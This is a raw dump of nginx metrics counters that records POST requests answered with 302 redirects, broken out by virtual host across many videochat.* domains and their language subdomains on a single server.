nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="kbmjvka.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="kctjjudm.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="kjjlaro.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="kk.videochat.cafe"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="kk.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="kk.videochat.tv.br"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="kk.videochat.world"} 549 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="km.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="km.videochat.mx"} 46 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="km.videochat.tv.br"} 142 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="km.videochat.world"} 176 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="kn.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="kn.videochat.mx"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="kn.videochat.tv.br"} 142 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="kn.videochat.world"} 214 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ko.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ko.videochat.date"} 174 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ko.videochat.mx"} 79 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ko.videochat.show"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ko.videochat.tv.br"} 114 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ko.videochat.world"} 600 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="kxylkid.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ky.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ky.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ky.videochat.show"} 168 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ky.videochat.tv.br"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ky.videochat.world"} 85 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lb.videochat.cafe"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lb.videochat.mx"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lb.videochat.show"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lb.videochat.tv.br"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lb.videochat.world"} 237 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lilvami.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lo.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lo.videochat.show"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lo.videochat.tv.br"} 43 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lo.videochat.world"} 112 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="localhost"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lt.videochat.cafe"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lt.videochat.date"} 284 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lt.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lt.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lt.videochat.tv.br"} 104 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lt.videochat.world"} 403 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lv.videochat.cafe"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lv.videochat.date"} 163 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lv.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lv.videochat.show"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lv.videochat.tv.br"} 98 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lv.videochat.world"} 206 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mail.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mg.videochat.cafe"} 123 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mg.videochat.date"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mg.videochat.mx"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mg.videochat.show"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mg.videochat.tv.br"} 85 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mg.videochat.world"} 157 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mi.videochat.cafe"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mi.videochat.date"} 73 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mi.videochat.mx"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mi.videochat.show"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mi.videochat.tv.br"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mi.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mk.videochat.date"} 188 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mk.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mk.videochat.tv.br"} 49 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mk.videochat.world"} 75 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ml.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ml.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ml.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ml.videochat.world"} 177 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mn.videochat.cafe"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mn.videochat.date"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mn.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mn.videochat.tv.br"} 38 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mn.videochat.world"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mr.videochat.cafe"} 72 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mr.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mr.videochat.show"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mr.videochat.tv.br"} 180 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mr.videochat.world"} 96 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mrj.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mrj.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mrj.videochat.mx"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mrj.videochat.show"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mrj.videochat.tv.br"} 43 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mrj.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ms.videochat.cafe"} 45 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ms.videochat.date"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ms.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ms.videochat.tv.br"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ms.videochat.world"} 128 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mt.videochat.cafe"} 84 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mt.videochat.mx"} 149 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mt.videochat.tv.br"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mt.videochat.world"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="my.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="my.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="my.videochat.tv.br"} 39 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="my.videochat.world"} 212 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ncawath.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ne.videochat.cafe"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ne.videochat.date"} 36 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ne.videochat.mx"} 88 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ne.videochat.show"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ne.videochat.tv.br"} 95 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ne.videochat.world"} 319 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="nl.videochat.cafe"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="nl.videochat.mx"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="nl.videochat.tv.br"} 130 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="nl.videochat.world"} 169 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="no.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="no.videochat.date"} 405 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="no.videochat.mx"} 466 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="no.videochat.tv.br"} 124 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="no.videochat.world"} 31 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="oxlioar.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pa.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pa.videochat.mx"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pa.videochat.tv.br"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pa.videochat.world"} 55 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pap.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pap.videochat.date"} 39 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pap.videochat.mx"} 78 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pap.videochat.show"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pap.videochat.tv.br"} 153 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pap.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pdxecxblqbkn.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pkiaram.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pl.videochat.cafe"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pl.videochat.date"} 173 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pl.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pl.videochat.show"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pl.videochat.tv.br"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pl.videochat.world"} 157 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pt.videochat.cafe"} 712 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pt.videochat.date"} 146 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pt.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pt.videochat.show"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pt.videochat.world"} 113 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="qdrqgda.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="qshicka.videochat.mx"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="rbohjhr.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ro.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ro.videochat.date"} 152 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ro.videochat.mx"} 249 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ro.videochat.show"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ro.videochat.tv.br"} 48 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ro.videochat.world"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ryfusmrj.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sco.videochat.cafe"} 127 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sco.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sco.videochat.mx"} 292 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sco.videochat.tv.br"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sco.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="semjnsl.videochat.mx"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="si.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="si.videochat.mx"} 51 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="si.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="si.videochat.tv.br"} 129 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="si.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sk.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sk.videochat.date"} 136 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sk.videochat.mx"} 237 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sk.videochat.tv.br"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sk.videochat.world"} 277 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sl.videochat.cafe"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sl.videochat.date"} 282 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sl.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sl.videochat.show"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sl.videochat.tv.br"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sl.videochat.world"} 186 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="slvdtur.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sptlqmk.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sr.videochat.date"} 193 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sr.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sr.videochat.tv.br"} 229 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sr.videochat.world"} 38 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="su.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="su.videochat.date"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="su.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="su.videochat.tv.br"} 36 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="su.videochat.world"} 51 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sv.videochat.cafe"} 364 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sv.videochat.date"} 312 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sv.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sv.videochat.show"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sv.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sv.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sw.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sw.videochat.date"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sw.videochat.mx"} 37 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sw.videochat.tv.br"} 48 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="sw.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ta.videochat.cafe"} 37 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ta.videochat.date"} 37 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ta.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ta.videochat.tv.br"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ta.videochat.world"} 39 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="te.videochat.cafe"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="te.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="te.videochat.tv.br"} 49 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="te.videochat.world"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="tg.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="tg.videochat.show"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="tg.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="tg.videochat.world"} 310 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="th.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="th.videochat.date"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="th.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="th.videochat.show"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="th.videochat.tv.br"} 126 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="th.videochat.world"} 234 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="tl.videochat.cafe"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="tl.videochat.date"} 190 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="tl.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="tl.videochat.tv.br"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="tl.videochat.world"} 240 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="tr.videochat.cafe"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="tr.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="tr.videochat.show"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="tr.videochat.tv.br"} 51 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="tr.videochat.world"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="tt.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="tt.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="tt.videochat.show"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="tt.videochat.tv.br"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="tt.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="udm.videochat.cafe"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="udm.videochat.mx"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="udm.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="udm.videochat.tv.br"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="udm.videochat.world"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="uk.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="uk.videochat.date"} 119 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="uk.videochat.mx"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="uk.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="uk.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="uk.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ur.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ur.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ur.videochat.show"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ur.videochat.tv.br"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ur.videochat.world"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="usavbchm.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="uz.videochat.cafe"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="uz.videochat.date"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="uz.videochat.mx"} 51 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="uz.videochat.show"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="uz.videochat.tv.br"} 106 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="uz.videochat.world"} 189 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="vi.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="vi.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="vi.videochat.tv.br"} 37 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="videochat.cafe"} 724 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="videochat.date"} 295 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="videochat.mx"} 868 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="videochat.show"} 325 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="videochat.tv.br"} 24815 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="videochat.world"} 692 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="vmi460104.contaboserver.net"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="waqqvxh.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="whuinar.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="wngqune.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="wwswnaz.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="www.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="www.videochat.date"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="www.videochat.world"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="xbodfbs.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="xgyvqlo.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="xh.videochat.cafe"} 46 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="xh.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="xh.videochat.show"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="xh.videochat.tv.br"} 200 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="xh.videochat.world"} 158 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ybifrit.videochat.mx"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="yfutyaz.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="yi.videochat.cafe"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="yi.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="yi.videochat.tv.br"} 92 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="yi.videochat.world"} 2 